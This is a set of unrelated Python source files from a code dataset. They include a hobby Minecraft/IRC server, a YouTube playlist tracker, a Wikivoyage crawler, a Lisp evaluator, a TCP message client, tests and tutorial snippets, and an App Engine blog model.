the IRC protocol for Client. \"\"\"\n \n def __init__(self, client, conn, addr, first_byte): \n self.NAME = \"irc\"\n self.client = client\n self.conn = conn\n self.addr = addr\n \n \n self.last_packet = first_byte.decode(\"ascii\")\n \n self.hostname = None\n self.realname = None\n self.servername = \"\"\n \n self.client.pos_changed = False\n self.client.positionable = False\n print (self.client.pos_changed)\n \n def __str__(self): return self.NAME\n \n def get_full_client_name(self, client = None):\n if client == None: client = self.client\n return client.name+\"!\"+client.protocol.NAME+\"@\"+client.protocol.addr[0]\n \n def recv(self):\n try:\n self.last_packet += self.conn.recv(1).decode(\"utf-8\")\n except socket.error:\n pass\n if self.last_packet[-2:] == \"\\r\\n\":\n self.parse_packet(self.last_packet)\n self.last_packet = \"\"\n \n def parse_packet(self, packet):\n argument = packet[packet.find(\":\")+1:].strip()\n packet = packet[:packet.find(\":\")].strip().split(\" \")\n command = packet[0]\n fields = ()\n for field in packet[1:]: fields+=(field.strip(),)\n print (command, fields, argument)\n if command == \"NICK\" and len(fields) > 0:\n self.client.name, = fields\n elif command == \"USER\" and len(fields) > 2:\n self.client.name, self.hostname, self.servername = fields\n self.realname = argument\n \n self.client.spawned = False\n \n self.send_packet(self.servername, \"001 \"+self.client.name, \"Welcome to this IRC server {}\".format(self.get_full_client_name()))\n self.send_packet(self.servername, \"002 \"+self.client.name, \"Your host is {}, running custom server software\".format(server.name))\n self.send_packet(self.servername, \"003 \"+self.client.name, \"This server was created today, or possibly earlier\")\n self.send_packet(self.servername, \"004 \"+self.client.name+\" \"+self.servername+\" twinserv\")\n \n self.send_packet(self.get_full_client_name(), \"JOIN\", \"#main\")\n \n elif command == \"TOPIC\":\n pass # Send RPL_TOPIC!\n elif command == \"NAMES\":\n pass # Send RPL_NAMEREPLY and RPL_ENDOFNAMES! \n elif command == \"QUIT\":\n self.disconnect(argument)\n elif command == \"PRIVMSG\":\n self.client.last_message = argument\n \n def send_packet(self, source, command, argument = None):\n packet = \":\"+source+\" \"+command\n if argument: packet+=\" :\"+argument\n packet = (packet+\"\\r\\n\").encode(\"utf-8\")\n print (packet)\n self.conn.send(packet)\n \n def send_message(self, message):\n #This is pending a rewrite!\n self.send_packet(\"*SERVER*\", \"PRIVMSG #main\", message)\n \n def send_spawn_player(self, client):\n pass\n # TODO: Actually make the player join, drop the server-forced message\n def send_despawn_player(self, client):\n pass\n def send_set_block(self, x, y, z, block): #This really shouldn't do anything.\n pass\n def send_player_teleport(self, client): pass\n \n def step(self):\n self.recv() \n\nclass Server:\n \"\"\" A class that handles the server. 
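A single instance owns the listening socket, the World and the fan-out: step() accepts new connections, pumps every client's protocol, then flushes the global message and block queues to all clients. Player identities persist in users.txt as one name;class line per user, indexed by position, with persistent id 0 reserved for the server itself. 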
\"\"\"\n\n def __init__(self):\n self.port = 25565\n self.users = 1337\n self.max = 9001\n self.name = \"TwinServ 015 (Half-assed IRC support!)\"\n self.motd = \"This is the MOTD!\"\n self.public = True\n self.salt = \"deadbeef13337357\"\n self.url = None\n\n self.online_mode = False\n\n self.chat_color = \"f\"\n\n #self.last_pid = 0\n\n self.clients = []\n self.message_queue = []\n self.position_queue = []\n\n self.main = World()\n if os.path.exists(\"map.twnsrv\"):\n self.main.load(\"map.twnsrv\")\n else:\n self.main.create_landscape()\n self.main.save(\"map.twnsrv\")\n\n #print (str(self.main.gzip_map()))\n \n self.load_persistent_ids()\n\n def get_name_for_persistent_id(self,persistent_id):\n if persistent_id == 0:\n return \"SERVER (World Generation or Physics)\"\n else:\n return server.persistent_ids[persistent_id][0]\n \n def get_class_for_persistent_id(self,persistent_id):\n if persistent_id == 0:\n return 'SERVER'\n else:\n if server.persistent_ids[persistent_id][1] == 'OP':\n return 'OP'\n else:\n return 'USER'\n\n def set_class_for_persistent_id(self,persistent_id,cls):\n if persistent_id != 0:\n server.persistent_ids[persistent_id][1] = cls\n self.save_persistent_ids()\n\n def load_persistent_ids(self):\n self.persistent_ids = []\n self.persistent_ids.append(['##SERVER','']) ## 0 is a reserved value\n if os.path.exists(\"users.txt\"):\n file = open(\"users.txt\",'r')\n ids = file.readlines()\n for i in ids:\n j = i.rstrip()\n j = j.split(';')\n self.persistent_ids.append(j)\n file.close()\n \n def save_persistent_ids(self):\n file = open(\"users.txt\",'wb')\n for i in self.persistent_ids:\n if i[0]!='##SERVER': ## Item 0 ('##SERVER') is a reserved value\n ts = i[0]+';'+i[1]+'\\n'\n file.write(ts.encode())\n file.close()\n \n def find_persistent_id(self,name):\n for i in range(len(self.persistent_ids)):\n if self.persistent_ids[i][0] == name:\n return i\n return None\n \n def add_persistent_id(self,name):\n persistent_id = len(self.persistent_ids) ## This works because len would be the last index + 1, and then I append an item that becomes this index\n self.persistent_ids.append([name,''])\n self.save_persistent_ids()\n return persistent_id\n \n def bind(self):\n self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n first = True\n while True:\n try:\n self.s.bind(('',self.port))\n except socket.error:\n if first:\n print (\"Sorry, can't bind to port \"+str(self.port)+random.choice([\": trololol\", \": It's troll time!\", \": Notch needs to go visit a dentist.\"]))\n first = False\n else:\n print (\"Trolling in progress (\"+str(random.randint(-127,346))+\"% done)\"+random.choice([\" - This may take a while\", \" - Nearly done!\", \" - i troll u\", \" - Almost like Notch!\", \" - This totally isn't taking forever\", \" - lololololol\", \" - I bet you can't wait!\", \" - Your operating system must really hate you\", \" - Port binding is fun!\", \" - It will be released in the next 2 seconds!\", \" - Almost as complete as Episode 3!\", \" - You might want to Notch Time this one.\", \" - So, about mudkips...\", \"\\nTraceback (most recent call last):... Just kidding!\", \" - Do it. 
Hit ^C and make the pain stop!\", \"- May i recommand port {}?\".format(abs(random.randrange(self.port-64, self.port+64, 1))), \"\\nCan't bind, waiting 2 sec...\", \"\\n\"+zlib.decompress(b'x\\xda\\x8b\\x0ew\\x0c\\xf2\\xf3\\xf4s\\x8fUpN\\xccS/Q\\xc8NM-P(-PTp\\xc9LQ(\\xc9HU(\\xae,.I\\xcdU(\\xc9\\xccMUH\\xceH\\xccKO\\xd5Q\\xc8/R\\xc8,\\x86\\xc8\\xa6\\x16\\x95\\xa5\\x16)\\xe4\\x03\\x89\\x9c\\xfc\\xc4\\x94\\xd4\\x14{\\x00K\\xf7\\x1b\\xf8').decode(\"ascii\")]))\n if random.randint(0,50)==25:\n print (\"\"\"\"\"\")\n\n\n time.sleep(random.choice([1, 2, 3, math.pi, 5]))\n else: break\n self.s.setblocking(0)\n print (\"\\007All binded, listening!\")\n\n def check_for_clients(self):\n self.s.listen(1)\n try: \n conn, addr = self.s.accept()\n recv = conn.recv(1)\n conn.setblocking(0) # todo: move this up so that even the first byte is nonblocking #hinthint just moving it up one line won't help\n self.clients.append(Client(conn,addr, recv))\n except socket.error: return\n\n\n def send_heartbeat(self):\n params = urllib.parse.urlencode({'port': self.port, 'users': self.users, 'max': self.max, \"name\":self.name, \"public\":self.public, \"version\":7, \"salt\":self.salt}) \n try: url = urllib.request.urlopen(\"http://www.minecraft.net/heartbeat.jsp?%s\" % params).read().strip()\n except urllib.error.HTTPError:\n print (\"Got HTTP error from heartbeat - is something invalid?\") ## This could also mean MC.net overloaded\n return None\n except urllib.error.URLError:\n print (\"Got URL error, minecraft.net might be down.\")\n return None\n print (url)\n return url\n\n\n\n def step(self):\n self.check_for_clients()\n # Stuff that doesn't enter the queue, and should be sent right away\n for client in self.clients:\n client.step()\n if client.despawn == True:\n for client2 in self.clients:\n if client is not client2:\n client2.protocol.send_despawn_player(client)\n self.message_queue.append(\"{}§{} disconnected{}.\".format(client.format_name(), self.chat_color, \" (\"+client.disconnect_reason+\")\" if client.disconnect_reason else \"\"))\n # del self.clients[client.pid] #For now just not registering them should be fine.\n client.despawn = False\n client.disconnected = True\n\n if client.spawned == False:\n if client.positionable:\n print (client.positionable, client.x, client.y, client.z, client.pos_changed)\n for client2 in self.clients:\n if client is not client2 and client2.disconnected == False:\n #print (\"Spawning {} for {}\".format(client, client2))\n client2.protocol.send_spawn_player(client)\n client.protocol.send_spawn_player(client2)\n self.message_queue.append(\"{}§{} ({}) has joined the game.\".format(client.format_name(), self.chat_color, client.protocol))\n client.spawned = True\n \n last_message = client.get_last_message()\n if last_message != None:\n self.message_queue.append(\"<{}§{}> {}\".format(client.format_name(), self.chat_color, last_message))\n if client.pos_changed == True and client.spawned == True:\n client.pos_changed = False\n for client2 in self.clients:\n if client is not client2:\n client2.protocol.send_player_teleport(client)\n \n # Stuff that /does/ enter the queue and gets send when it's fully collected\n for client in self.clients:\n for message in self.message_queue:\n print (message)\n client.message_queue.append(message)\n for x, y, z in self.main.block_queue:\n #if client.pid != self.main.map[x][y][z].changed_by: #TODO!!! 
CURRENTLY IT SENDS CHANGES BY THE CLIENT BACK \n client.block_queue.append((x, y, z))\n \n self.message_queue = []\n self.main.block_queue = []\n \nserver = Server()\nserver.bind()\nwhile True:\n #server.send_heartbeat()\n server.step()\n \n\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":78827,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"412490888","text":"#!/usr/bin/env python3\n\nfrom tinydb import TinyDB, where\nimport time\nimport os\nimport json\nimport argparse\nimport pathlib\n\n\nclass YoutubePlaylistTracker:\n def __init__(self, db_path):\n self.db = TinyDB(os.path.normpath(os.path.join(db_path, \"db.tinydb\")))\n self.update_time = time.time()\n\n def handle_batch(self, batch_file_path):\n with open(batch_file_path) as b_file:\n batch = json.load(b_file)\n\n for v in filter(lambda x: x is not None, batch[\"entries\"]):\n v[\"__update_time\"] = self.update_time\n self.db.upsert(v, where(\"id\") == v[\"id\"])\n\n self.check_updated()\n\n def check_updated(self):\n latest_time = sorted(\n self.db.all(), key=lambda doc: doc[\"__update_time\"], reverse=True\n )[0][\"__update_time\"]\n for v in self.db.search(where(\"__update_time\") != latest_time):\n print(\"{} was not updated. [{}]\".format(v[\"title\"], v[\"id\"]))\n\n\ndef get_latest_batch_from_folder(folder):\n import re\n\n try:\n batch = sorted(\n filter(\n lambda file: re.match(\n r\"[0-9]+_[0-9]+_[0-9]+_[0-9]+__HISTORY.json\", file\n ),\n os.listdir(folder),\n ),\n reverse=True,\n )[0]\n return os.path.normpath(os.path.join(folder, batch))\n except IndexError:\n exit(print(\"No batch json file on folder {}.\".format(folder)))\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--check\", action=\"store_true\", help=\"Only check\")\n parser.add_argument(\n \"folder\",\n nargs=\"?\",\n help=\"The playlist folder (has historical playlist information in tinydb.json)\",\n default=pathlib.Path().absolute(),\n )\n parser.add_argument(\n \"batch\",\n nargs=\"?\",\n help=\"\"\"\n Path to JSON dump from Youtube-DL to update the database with.\n If left unset, it expects a file in the format year_month_date_timestamp.json to be in the folder, and it will pick the latest one (sorted in descending order by file name) as the batch.\n \"\"\",\n default=None,\n )\n args = parser.parse_args()\n\n db = YoutubePlaylistTracker(args.folder)\n if args.check:\n db.check_updated()\n else:\n batch = args.batch\n if batch is None:\n batch = get_latest_batch_from_folder(args.folder)\n # exit(print(batch))\n\n db.handle_batch(batch)\n","sub_path":"youtube-playlist-tracker/update_playlist.py","file_name":"update_playlist.py","file_ext":"py","file_size_in_byte":2495,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"90063091","text":"from collections import defaultdict\nimport pickle\n\nt_c_dic = defaultdict(int)\nt_dic = defaultdict(int)\nc_dic = defaultdict(int)\n\nfor line in open('knock82.txt'):\n t, c = line.split('\\t')\n cs = c.split()\n t_dic[t] += 1 \n for c in cs:\n t_c_dic[t + ' ' + c] += 1\n c_dic[c] += 1\nN = sum(t_c_dic.values())\n\nwith open('knock83.txt', 'wb') as w_f:\n pickle.dump((dict(t_c_dic), dict(t_dic), dict(c_dic), N), w_f)\n\n\n\n","sub_path":"arai/chapter09/knock83.py","file_name":"knock83.py","file_ext":"py","file_size_in_byte":438,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} 
+{"seq_id":"488938192","text":"\nimport time\n\n\"\"\"\nFind large number primes.\nGoal: Find prime numbers that are more than 6 digits.\n\"\"\"\n\n###################\n##1. Brute Force ##\n###################\n\ndef brute_prime_finder(num, digits):\n    # \"num\": number of primes I want\n    # \"digits\": number of digits I want my primes to be\n\n    start_t = time.perf_counter()\n\n    if digits == 1:\n        return [2,3,5,7], 0.0\n\n    total_primes = []\n    number = 10\n    while len(total_primes) < num and (number // (10 ** digits) == 0):\n        if number // (10 ** (digits-1)) != 0: #if number is in the range for number of digits we want\n            if is_prime(number):\n                total_primes.append(number)\n        number += 1\n\n    end_t = time.perf_counter()\n    return total_primes, (end_t - start_t)\n\ndef is_prime(num):\n    if num == 1:\n        return False\n    i = 2\n    while i != num:\n        if num % i == 0:\n            return False\n        i += 1\n    return True\n\ndef factor_num(num):\n    all_factors = []\n    i = 1\n    while i != (num + 1):\n        if not(num % i):\n            all_factors.append(i)\n        i += 1\n    return all_factors\n","sub_path":"find_primes.py","file_name":"find_primes.py","file_ext":"py","file_size_in_byte":1104,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"163967159","text":"import pytest\nfrom trinity.tools.async_process_runner import AsyncProcessRunner\nfrom trinity._utils.async_iter import (\n    contains_all,\n)\n\n\n@pytest.mark.parametrize(\n    'command',\n    (\n        ('trinity-beacon', 'testnet', \"--num=1\", \"--genesis-delay=10\"),\n        ('trinity-beacon', 'testnet', \"--num=1\", \"--genesis-time=1559315137\"),\n    )\n)\n@pytest.mark.asyncio\nasync def test_directory_generation(command, tmpdir):\n    testnet_path = tmpdir / \"testnet\"\n    testnet_path.mkdir()\n    command = command + (f\"--network-dir={testnet_path}\", )\n    async with AsyncProcessRunner.run(command, timeout_sec=30) as runner:\n        assert await contains_all(runner.stderr, {\n            \"Network generation completed\",\n        })\n\n\n@pytest.mark.parametrize(\n    'command',\n    (\n        ('trinity-beacon', 'testnet', \"--num=1\",),\n    )\n)\n@pytest.mark.asyncio\nasync def test_missing_genesis_time_arg(command):\n    async with AsyncProcessRunner.run(command, timeout_sec=30) as runner:\n        assert await contains_all(runner.stderr, {\n            \"one of the arguments --genesis-delay --genesis-time is required\",\n        })\n","sub_path":"tests/components/eth2/network_generator/test_network_generator.py","file_name":"test_network_generator.py","file_ext":"py","file_size_in_byte":1120,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"268417864","text":"import random\n\nfrom django.core.management.base import BaseCommand, CommandError\nfrom django.contrib.auth.models import User\n\nfrom blog.models import Article\n\nclass Command(BaseCommand):\n    help = 'Create test article'\n\n    def add_arguments(self, parser):\n        parser.add_argument('coll_article')\n\n    def handle(self, *args, **options):\n        coll_article = int(options.get('coll_article'))\n        user = User.objects.all()\n        for item in range(coll_article):\n            user_ = random.choice(user)\n            article = Article(\n                title = 'title{}'.format(item),\n                text = 'text{}'.format(item),\n                user = user_\n            )\n            article.save()","sub_path":"blog/management/commands/create_test_article.py","file_name":"create_test_article.py","file_ext":"py","file_size_in_byte":709,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"300442285","text":"\n#!/usr/bin/python3\n#import pywikibot\nimport os\nimport 
requests\nimport time\nfrom bs4 import BeautifulSoup\nfrom datetime import datetime\n\n\n# url list creation by city\n# request the text by city\n\"\"\"\ncreate file_name by city url\n\"\"\"\nurl_list_file_name = \"pintween_wikivoyage_url_list.txt\"\nTHIS_FOLDER = os.path.dirname(os.path.abspath(__file__))\n\n\n\n\"\"\"\nBuild the output file name from the wikivoyage URL plus a timestamp.\n\"\"\"\ndef create_filename(url):\n    url_words = url.split(\"/\")\n    url_header_word = \"\"\n\n    for block in url_words:\n        if block == \"https:\":\n            # do nothing\n            continue\n        elif block == \"wiki\":\n            # do nothing\n            continue\n        elif block == \"\":\n            # do nothing\n            continue\n        else:\n            url_header_word += block + \"_\"\n\n    now = datetime.now()\n    date_time = now.strftime(\"%m%d_%Y_%H%M%S\")\n    file_name_withURL = url_header_word + \"_\" + date_time + \".txt\"\n\n    return file_name_withURL\n\n\n\n\n\"\"\"\nfetch URLs from wikivoyage\n\"\"\"\nwith open(url_list_file_name) as openfileobject:\n    for wikivoyage_url in openfileobject:\n        print(wikivoyage_url)\n        wikivoyage_page = requests.get(wikivoyage_url.rstrip())\n        if wikivoyage_page.status_code == 200:\n            file_name_withURL = create_filename(wikivoyage_url.rstrip())\n            pintween_file_name = os.path.join(THIS_FOLDER, file_name_withURL)\n            pintween_file_crawled = open(pintween_file_name, \"wb+\")\n            pintween_file_crawled.write(wikivoyage_page.content)\n            pintween_file_crawled.close()\n            print(\"the URL crawled successfully: \" + wikivoyage_url)\n        else:\n            print(\"Failed to fetch the URL: \" + wikivoyage_url + \" Error Code: \" + str(wikivoyage_page.status_code))\n\n        # Wait for 60 seconds between requests\n        print(\"waiting 60 seconds ...\")\n        time.sleep(60)\n\n","sub_path":"pintween_url_crawler.py","file_name":"pintween_url_crawler.py","file_ext":"py","file_size_in_byte":1802,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"490231772","text":"import pdb\r\nfrom scan_lexer import Symbol\r\nfrom functools import reduce\r\nimport operator\r\n\r\n\r\nglobal_env = [\r\n    (\"car\" , lambda x : x[0]) ,\r\n    (\"cdr\" , lambda x : x[1:]) ,\r\n    (\"max\" , max) ,\r\n    (\"min\" , min) ,\r\n    (\"+\" , lambda *x: reduce(operator.add, list(x))) ,\r\n    (\"-\" , lambda *x: reduce(operator.sub, list(x)))\r\n]\r\n\r\n\r\ndef evaluate(exp, env = global_env):\r\n    # pdb.set_trace()\r\n    # Is exp an atom?\r\n    if atom(exp):\r\n        if type(exp) == Symbol:\r\n            return lookup(exp, env)\r\n        elif True in [isinstance(exp, x) for x in [int, float, str, bool]]:\r\n            return exp\r\n        else:\r\n            raise TypeError(\"Unknown type atom\", exp)\r\n\r\n    # Is exp the null list?\r\n    if exp == []:\r\n        return []\r\n\r\n    # Is exp a special form?\r\n    elif exp[0] == \"quote\":\r\n        return exp[1]\r\n    elif exp[0] == \"if\":\r\n        if istrue(evaluate(exp[1], env)):\r\n            return evaluate(exp[2], env)\r\n        else:\r\n            return evaluate(exp[3], env)\r\n    elif exp[0] == \"begin\":\r\n        return eprogn(exp[1:], env)\r\n    elif exp[0] == \"set!\":\r\n        update(exp[1], env, evaluate(exp[2], env))\r\n    elif exp[0] == \"lambda\":\r\n        return make_function(exp[1], exp[2:], env)\r\n\r\n    # exp is function application\r\n    else:\r\n        return invoke(evaluate(exp[0], env), evlist(exp[1:], env))\r\n\r\n\r\ndef atom(s):\r\n    return not isinstance(s, list)\r\n\r\ndef istrue(exp):\r\n    if exp == False:\r\n        return False\r\n    else:\r\n        return True\r\n\r\ndef eprogn(exps, env):\r\n    results = [evaluate(exp, env) for exp in exps]\r\n    return results[-1]\r\n\r\ndef invoke(fn, arg_list):\r\n    # pdb.set_trace()\r\n    return fn(*arg_list)\r\n\r\ndef evlist(l, env):\r\n    return [evaluate(x, env) for x in 
l]\r\n\r\n# update is impure.\r\ndef update(var, env, value):\r\n    # pdb.set_trace()\r\n    for i in range(len(env)):\r\n        if env[i][0] == var:\r\n            env[i] = (var, value)\r\n            return\r\n    raise Exception(\"No such symbol found: \", var)\r\n    \r\ndef make_function(variables, body, env):\r\n    return lambda *values : evaluate(body[0], extend(env, variables, list(values)))\r\n\r\ndef lookup(var, env):\r\n    for u, v in env:\r\n        if u == var:\r\n            return v\r\n    raise Exception(\"No such binding: \", var)\r\n\r\ndef extend(env, variables, values):\r\n    if len(variables) != len(values):\r\n        raise ValueError(\"Too few or too many values.\")\r\n    else:\r\n        bindings = list(zip(variables, values))\r\n        return bindings + env\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"evaluator.py","file_name":"evaluator.py","file_ext":"py","file_size_in_byte":2543,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"126534719","text":"'''\nThe MIT License\n\nCopyright (c) 2010-2017 Josh A. Bosley, http://joshbosley.com\n\nPermission is hereby granted, free of charge, to any person obtaining a copy\nof this software and associated documentation files (the \"Software\"), to deal\nin the Software without restriction, including without limitation the rights\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell\ncopies of the Software, and to permit persons to whom the Software is\nfurnished to do so, subject to the following conditions:\n\nThe above copyright notice and this permission notice shall be included in\nall copies or substantial portions of the Software.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\nOUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\nTHE SOFTWARE.\n'''\n\nimport socket\nimport logging\n\n# Send the server a message\ndef outgoingQuery(address, port, query, logger=None, timeout=10):\n    \n    if logger is None:\n        logger = logging.getLogger(__name__)\n    \n    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n    sock.settimeout(timeout)\n    try:\n        sock.connect((address, port))\n    except:\n        sock.close()\n        logger.info(\"__SETUP__ERROR__\")\n        return -1\n    \n    query = query.encode()\n\n    # Send size of request to server\n    sock.sendall(str(len(query)).encode())\n\n    # Ensure server is ready\n    try:\n        verification = sock.recv(4096).decode(\"utf-8\")\n    except:\n        logger.info(\"Socket time out\")\n        return -1\n\n    if verification != \"__ACCEPTED__\":\n        logger.warning(\"__FAILED_TO_SEND_SIZE__\")\n        return -1\n    \n    # Send the data\n    total = 0\n    while total < len(query):\n        sent = sock.send(query[total:])\n        if 0 == sent:\n            logger.warning(\"SOCKET BROKEN WHEN SENDING DATA\")\n        total = total + sent\n    \n    # Check to make sure that the server got the request\t\n    verification = sock.recv(4096).decode(\"utf-8\")\n    if verification != \"__ACCEPTED__\":\n        logger.info(\"NO ACCEPTANCE ON MESSAGE SEND\")\n        return -3\n\n    # Request sent, now get the response\n    # Start by getting the size of the request\n    try:\n        size = sock.recv(4096)\n    except:\n        sock.sendall(\"__ERROR__\".encode())\n        sock.close()\n        return\n\n    try:\n        size = int(size)\n    except:\n        logger.warning(\"COULDN'T VERIFY REQUEST SIZE FROM SERVER\")\n        sock.sendall(\"__ERROR__\".encode())\n        sock.close()\n        return\n\n    # Inform the server that we accept their given size\n    try:\n        sock.sendall(\"__ACCEPTED__\".encode())\n    except:\n        sock.close()\n        return -1\n\n    # Receive the data\n    chunks = []\n    bytes_recd = 0\n    while bytes_recd < size:\n        try:\n            chunk = sock.recv(min(size - bytes_recd, 1024))\n        except:\n            sock.close()\n            return -4\n        if chunk == b'':\n            sock.close()\n            logger.warning(\"BROKEN_SOCKET\")\n            return -4\n        chunks.append(chunk)\n        bytes_recd = bytes_recd + len(chunk)\n    \n    # Assemble to plaintext\n    resp = (b\"\".join(chunks))\n    \n    # Tell the server that we received the data\n    try:\n        sock.sendall(\"__ACCEPTED__\".encode())\n    except:\n        sock.close()\n        return -1\n    \n    # Close the socket and pass back the response\n    sock.close()\n    return resp\n\n'''\n    Testing the sending functionality\n'''\nif __name__ == \"__main__\":\n\n    logging.basicConfig(format='%(asctime)s [TRANSMITTER]: %(message)s <%(levelname)s>')\n    thelogger = logging.getLogger(__name__)\n\n    t = \"*\" * 2 ** 25\n    outgoingQuery(\"127.0.0.1\", 9000, t, thelogger)","sub_path":"Python/DigitalHills-Archive/obelisk-cab/connector/tcpout/transmitter.py","file_name":"transmitter.py","file_ext":"py","file_size_in_byte":3960,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"515402660","text":"from typing import Union\n\nfrom fastapi import Body, FastAPI\nfrom pydantic import BaseModel\n\napp = FastAPI()\n\n\nclass Item(BaseModel):\n    name: str\n    description: Union[str, None] = None\n    price: float\n    tax: Union[float, None] = None\n\n\nclass User(BaseModel):\n    username: str\n    full_name: Union[str, None] = None\n\n\n@app.put(\"/items/{item_id}\")\nasync def update_item(\n    *,\n    item_id: int,\n    item: Item,\n    user: User,\n    importance: int = Body(gt=0),\n    q: Union[str, None] = 
None,\n):\n results = {\"item_id\": item_id, \"item\": item, \"user\": user, \"importance\": importance}\n if q:\n results.update({\"q\": q})\n return results\n","sub_path":"docs_src/body_multiple_params/tutorial004.py","file_name":"tutorial004.py","file_ext":"py","file_size_in_byte":653,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"156266613","text":"from __future__ import print_function\nimport argparse\nimport torch\nimport torchvision\nimport torchvision.transforms as transforms\nimport torch.optim as optim\nimport torch.utils.data\nfrom models import vgg, resnet, densenet, base_cnn, TDNN\n\n# Training settings\nparser = argparse.ArgumentParser(description='Test architectures with dummy data')\nparser.add_argument('--model', choices=['cnn', 'vgg', 'resnet', 'densenet', 'tdnn'], default='resnet')\nparser.add_argument('--nclasses', type=int, default=10, metavar='N', help='number of classes')\nargs = parser.parse_args()\n\n\nif args.model == 'cnn':\n\tmodel = base_cnn.CNN(n_classes=args.nclasses)\nelif args.model == 'vgg':\n\tmodel = vgg.VGG('VGG11', n_classes=args.nclasses)\nelif args.model == 'resnet':\n\tmodel = resnet.ResNet12(n_classes=args.nclasses)\nelif args.model == 'densenet':\n\tmodel = densenet.DenseNet121(n_classes=args.nclasses)\nelif args.model == 'tdnn':\n\tmodel = TDNN.TDNN(n_classes=args.nclasses)\n\nprint('\\n', model, '\\n')\nprint('\\n\\nNumber of parameters: {}\\n'.format(sum(p.numel() for p in model.parameters())))\n\nbatch = torch.rand(3, 1, 40, 500)\n\nout = model.forward(batch)\n\nprint(out.size(), '\\n')","sub_path":"mel_spec/test_arch.py","file_name":"test_arch.py","file_ext":"py","file_size_in_byte":1158,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"625330239","text":"import argparse\nimport configparser\nimport os\n\n\ndef parse_config():\n parser = argparse.ArgumentParser(description='HypeTracker',\n prog='python -m hypetracker.main')\n parser.add_argument('-c', '--config', help=\"config file\")\n args = parser.parse_args()\n default = os.path.join(os.path.dirname(__file__), 'hypetracker.conf.example')\n configs = [default]\n args.config and configs.append(args.config)\n config = configparser.ConfigParser()\n config.read(configs)\n return config\n","sub_path":"hypetracker/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":535,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"335579999","text":"import aetycoon\r\nimport datetime\r\nimport hashlib\r\nimport re\r\nfrom google.appengine.ext import db\r\nfrom google.appengine.ext import deferred\r\n\r\nimport config\r\nimport generators\r\nimport markup\r\nimport static\r\nimport utils\r\n\r\n\r\nif config.default_markup in markup.MARKUP_MAP:\r\n DEFAULT_MARKUP = config.default_markup\r\nelse:\r\n DEFAULT_MARKUP = 'html'\r\n\r\n\r\nclass BlogDate(db.Model):\r\n \"\"\"Contains a list of year-months for published blog posts.\"\"\"\r\n\r\n @classmethod\r\n def get_key_name(cls, post):\r\n return '%d/%02d' % (post.published_tz.year, post.published_tz.month)\r\n\r\n @classmethod\r\n def create_for_post(cls, post):\r\n inst = BlogDate(key_name=BlogDate.get_key_name(post))\r\n inst.put()\r\n return inst\r\n\r\n @classmethod\r\n def datetime_from_key_name(cls, key_name):\r\n year, month = key_name.split('/')\r\n return datetime.datetime(int(year), int(month), 1, tzinfo=utils.tzinfo())\r\n\r\n @property\r\n def date(self):\r\n 
return BlogDate.datetime_from_key_name(self.key().name()).date()\r\n\r\n\r\nclass BlogPost(db.Model):\r\n  # The URL path to the blog post. Posts have a path iff they are published.\r\n  path = db.StringProperty()\r\n  title = db.StringProperty(required=True, indexed=False)\r\n  body_markup = db.StringProperty(choices=set(markup.MARKUP_MAP),\r\n                                  default=DEFAULT_MARKUP)\r\n  body = db.TextProperty(required=True)\r\n  tags = aetycoon.SetProperty(basestring, indexed=False)\r\n  published = db.DateTimeProperty()\r\n  updated = db.DateTimeProperty(auto_now=False)\r\n  deps = aetycoon.PickleProperty()\r\n  original_author_as_user = db.UserProperty() # User object for original author\r\n  original_author_name = db.StringProperty() # User name string for original author\r\n  editors = db.StringListProperty() # User name strings for subsequent editors\r\n  locked = db.BooleanProperty(default=True) # Determines whether the post is locked from being edited. Defaults to true.\r\n\r\n  @property\r\n  def published_tz(self):\r\n    return utils.tz_field(self.published)\r\n\r\n  @property\r\n  def updated_tz(self):\r\n    return utils.tz_field(self.updated)\r\n\r\n  @aetycoon.TransformProperty(tags)\r\n  def normalized_tags(tags):\r\n    return list(set(utils.slugify(x.lower()) for x in tags))\r\n  \r\n  def normalized_original_author_name(self):\r\n    return utils.slugify(self.original_author_name.lower())\r\n\r\n  @property\r\n  def tag_pairs(self):\r\n    return [(x, utils.slugify(x.lower())) for x in self.tags]\r\n\r\n  @property\r\n  def rendered(self):\r\n    \"\"\"Returns the rendered body.\"\"\"\r\n    return markup.render_body(self)\r\n\r\n  @property\r\n  def summary(self):\r\n    \"\"\"Returns a summary of the blog post.\"\"\"\r\n    return markup.render_summary(self)\r\n\r\n  @property\r\n  def hash(self):\r\n    val = (self.title, self.body, self.published)\r\n    return hashlib.sha1(str(val)).hexdigest()\r\n\r\n  